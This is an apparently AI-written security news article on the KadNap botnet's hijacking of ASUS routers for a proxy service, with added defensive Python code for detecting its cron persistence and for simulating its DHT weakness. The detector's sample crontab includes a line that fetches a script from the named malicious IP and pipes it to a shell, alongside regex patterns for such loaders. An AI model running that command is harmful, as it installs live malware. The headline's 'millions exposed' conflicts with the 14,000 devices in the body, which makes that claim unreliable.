Ethical Hacking News
The new KadNap botnet hijacks ASUS routers to fuel a cybercrime proxy network, leaving millions exposed. The malware's decentralized design makes it difficult for defenders to identify and disrupt the C2 infrastructure, highlighting the need for organizations to stay vigilant and take proactive measures to protect themselves against these types of threats.
The KadNap botnet is exploiting ASUS routers and other edge networking devices as proxies for malicious traffic. The botnet has grown to 14,000 devices, with nearly half connected to C2 servers dedicated to ASUS-based bots. The KadNap malware uses a modified Kademlia-based DHT protocol to locate botnet nodes and evade traditional network monitoring. The botnet is linked to the Doppelganger proxy service, selling access to infected devices as residential proxies. Organizations must stay vigilant and take proactive measures to protect themselves against these types of threats.
New KadNap botnet hijacks ASUS routers to fuel cybercrime proxy network, leaving millions exposed.
In a shocking turn of events, researchers at Black Lotus Labs have discovered that the newly emerged KadNap botnet is exploiting ASUS routers and other edge networking devices as proxies for malicious traffic. This latest development highlights the ongoing threat landscape in the world of cybersecurity, where hackers are continually finding innovative ways to exploit vulnerabilities and wreak havoc on unsuspecting victims.
According to the researchers, the KadNap botnet has grown to a staggering 14,000 devices that are part of a peer-to-peer network, with nearly half of these devices connected to Command-and-Control (C2) servers dedicated to ASUS-based bots. This decentralized approach makes it difficult for defenders to identify and disrupt the C2 infrastructure, as each node manages a subset of the complete data.
The KadNap infection chain begins with the download of a malicious script (aic.sh) from 212.104.141[.]140, which establishes persistence via a cron job that runs every 55 minutes. The payload is an ELF binary named kad, which installs the KadNap client. Once active, the malware determines the host's external IP address and contacts multiple Network Time Protocol (NTP) servers to obtain the current time and system uptime.
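The persistence step above (a recurring cron job that re-fetches a shell script from a bare IP) is something a defender can hunt for on routers and Linux hosts. The following is an added detection example written for this article, not code from Black Lotus Labs or the botnet itself; the sample crontab lines are constructed, and the only indicator used is the aic.sh host the article names.

```python
import re
from ipaddress import ip_address

# Indicator named in the article, re-fanged from 212.104.141[.]140 (the aic.sh host).
KADNAP_IOCS = {"212.104.141.140"}

# Standard five-field crontab entry followed by the command.
_CRON_RE = re.compile(r"^(?P<min>\S+)\s+(?P<hour>\S+)\s+\S+\s+\S+\s+\S+\s+(?P<cmd>.+)$")
# curl/wget fetching a shell script straight from a bare IPv4 address.
_FETCH_RE = re.compile(
    r"\b(?:curl|wget)\b.*?https?://(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/\S*\.sh\b"
)

def _interval_minutes(min_field, hour_field):
    """Minute interval for '*/N' style entries (the KadNap job runs every 55 minutes)."""
    m = re.fullmatch(r"\*/(\d+)", min_field)
    return int(m.group(1)) if m and hour_field == "*" else None

def find_suspicious_cron(crontab_lines):
    """Flag cron entries that periodically pull a .sh script from a bare IP."""
    hits = []
    for raw in crontab_lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # skip blanks and commented-out entries
        m = _CRON_RE.match(line)
        f = _FETCH_RE.search(m.group("cmd")) if m else None
        if not f:
            continue
        try:
            ip = str(ip_address(f.group("ip")))   # reject 999.1.1.1 style false matches
        except ValueError:
            continue
        hits.append({
            "interval_min": _interval_minutes(m.group("min"), m.group("hour")),
            "ip": ip,
            "known_ioc": ip in KADNAP_IOCS,
            "line": line,
        })
    return hits

# Constructed sample crontab (not a real capture); the second line mimics the
# behaviour described in the article: a 55-minute job re-fetching aic.sh.
SAMPLE_CRONTAB = [
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "*/55 * * * * wget -q http://212.104.141.140/aic.sh -O- | sh",
    "*/15 * * * * curl -s https://updates.example.com/check.sh | sh",
    "# */5 * * * * curl http://10.0.0.5/x.sh | sh",
]

if __name__ == "__main__":
    for hit in find_suspicious_cron(SAMPLE_CRONTAB):
        print(hit)
```

Entries that match but are not on the indicator list still deserve a look, since the same pattern (bare IP, shell script, short interval) is generic loader behaviour rather than something unique to KadNap.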
Interestingly, KadNap employs a modified Kademlia-based Distributed Hash Table (DHT) protocol to locate botnet nodes and the C2 infrastructure. This custom version of the DHT protocol is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring.
However, researchers discovered that KadNap's implementation of Kademlia is undermined by a consistent connection to two specific nodes, which occurs before the C2 servers are reached. This reduces the decentralization the protocol could achieve in the ideal case and makes it possible to identify the control infrastructure.
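To see why fixed bootstrap peers undo most of what a Kademlia-style DHT buys the operator, here is a small simulation added for this article (not Black Lotus Labs' tooling and not the KadNap protocol itself). It models a toy network of bots that each start an iterative XOR-distance lookup from the same two hard-coded peers; counting which peers every lookup touches shows the chokepoint a defender can watch. Node names, the 64-bit ID size and the rendezvous key are all constructed.

```python
import hashlib
import random

def node_id(addr):
    """Kademlia-style node ID from an address (toy: first 64 bits of SHA-256)."""
    return int.from_bytes(hashlib.sha256(addr.encode()).digest()[:8], "big")

def xor_distance(a, b):
    """Kademlia measures closeness as the XOR of two IDs."""
    return a ^ b

class ToyDHT:
    """Constructed Kademlia-like overlay: every node knows a few random bots,
    and every fresh bot starts its lookups from the same hard-coded bootstrap peers."""
    def __init__(self, bots, bootstrap, k=3, seed=1):
        rng = random.Random(seed)
        everyone = list(bots) + list(bootstrap)
        self.bots, self.bootstrap, self.k = list(bots), list(bootstrap), k
        self.ids = {p: node_id(p) for p in everyone}
        self.tables = {p: set(rng.sample(self.bots, k)) | set(bootstrap) for p in everyone}
        self.contacts = {p: 0 for p in everyone}   # how many lookups queried each peer

    def closest(self, cands, target, n):
        return sorted(cands, key=lambda p: xor_distance(self.ids[p], target))[:n]

    def lookup(self, origin, target_key):
        """Iterative FIND_NODE: query the k closest known peers, merge their replies, repeat."""
        known = set(self.bootstrap)       # a fresh bot knows only the bootstrap peers
        queried = {origin}
        while True:
            batch = [p for p in self.closest(known, target_key, self.k) if p not in queried]
            if not batch:
                return self.closest(known, target_key, self.k)
            for p in batch:
                queried.add(p)
                self.contacts[p] += 1
                known |= self.tables[p]   # the peer answers with its own contacts

def bootstrap_exposure(dht, target_key):
    """Run one lookup per bot and return the peers that every single lookup contacted."""
    for bot in dht.bots:
        dht.lookup(bot, target_key)
    return sorted(p for p, c in dht.contacts.items() if c >= len(dht.bots))

if __name__ == "__main__":
    dht = ToyDHT([f"bot{i}" for i in range(40)], ["boot-a", "boot-b"])
    print(bootstrap_exposure(dht, node_id("kadnap-c2-rendezvous")))
```

Peers that appear in every lookup (the bootstrap nodes, plus whichever nodes sit closest to the rendezvous key) are exactly the ones a blocklist or flow monitor can key on, which is the weakness the researchers exploited to map the infrastructure.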
The KadNap botnet has been linked to the Doppelganger proxy service, believed to be a rebrand of the Faceless service, previously associated with TheMoon malware botnet, which also targeted ASUS routers. Doppelganger sells access to infected devices as residential proxies that can be used to funnel malicious traffic, create pseudonymization layers, and evade blocklists.
These services are typically used to launch distributed denial-of-service (DDoS), credential stuffing, and brute-force attacks, all of which are traced back first to the KadNap victims whose devices relay the traffic. Lumen has taken proactive measures against the KadNap botnet, blocking all network traffic to or from the control infrastructure and releasing a list of indicators of compromise to help others disrupt the botnet on their end.
The discovery of the KadNap botnet highlights the ongoing threat landscape in the world of cybersecurity. With the increasing use of IoT devices and edge networking, hackers are finding new ways to exploit vulnerabilities and wreak havoc on unsuspecting victims. As such, it is essential for organizations to stay vigilant and take proactive measures to protect themselves against these types of threats.
In conclusion, the KadNap botnet represents a significant threat to cybersecurity, with its exploitation of ASUS routers and other edge networking devices as proxies for malicious traffic. The decentralized approach used by the KadNap malware makes it difficult for defenders to identify and disrupt the C2 infrastructure, highlighting the need for organizations to stay vigilant and take proactive measures to protect themselves against these types of threats.
Related Information:
https://www.ethicalhackingnews.com/articles/New-KadNap-Botnet-Exploits-ASUS-Routers-to-Fuel-Cybercrime-Proxy-Network-Leaving-Millions-Exposed-ehn.shtml
https://www.bleepingcomputer.com/news/security/new-kadnap-botnet-hijacks-asus-routers-to-fuel-cybercrime-proxy-network/
Published: Tue Mar 10 10:24:37 2026 by llama3.2 3B Q4_K_M